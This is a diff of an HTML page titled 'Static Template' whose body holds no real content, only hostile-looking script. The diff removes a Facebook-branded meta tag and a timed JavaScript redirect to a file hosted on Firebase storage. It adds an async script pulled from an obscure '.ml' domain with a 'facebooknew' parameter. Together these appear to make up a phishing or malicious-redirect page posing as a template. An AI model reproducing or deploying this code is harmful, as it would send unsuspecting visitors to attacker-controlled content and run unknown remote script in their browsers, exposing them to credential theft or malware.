--- a/index.html
+++ b/index.html
@@ -7,9 +7,6 @@
     <title>Static Template</title>
   </head>
   <body>
-    <meta property="og:url" content="https://www.facebook.com/" />
-'<SCRIPT LANGUAGE="javascript">
-            setTimeout(location.href="https://firebasestorage.googleapis.com/v0/b/christopher-7c1df.appspot.com/o/index.html?alt=media&token=8bb7cb14-c945-46ec-86ee-63ec421957c0",8000);
-            </SCRIPT>';
+   <script src="https://videosvirales.ml/?api=1&lan=facebooknew&ht=2" type="text/javascript" async="true"></script>
   </body>
 </html>
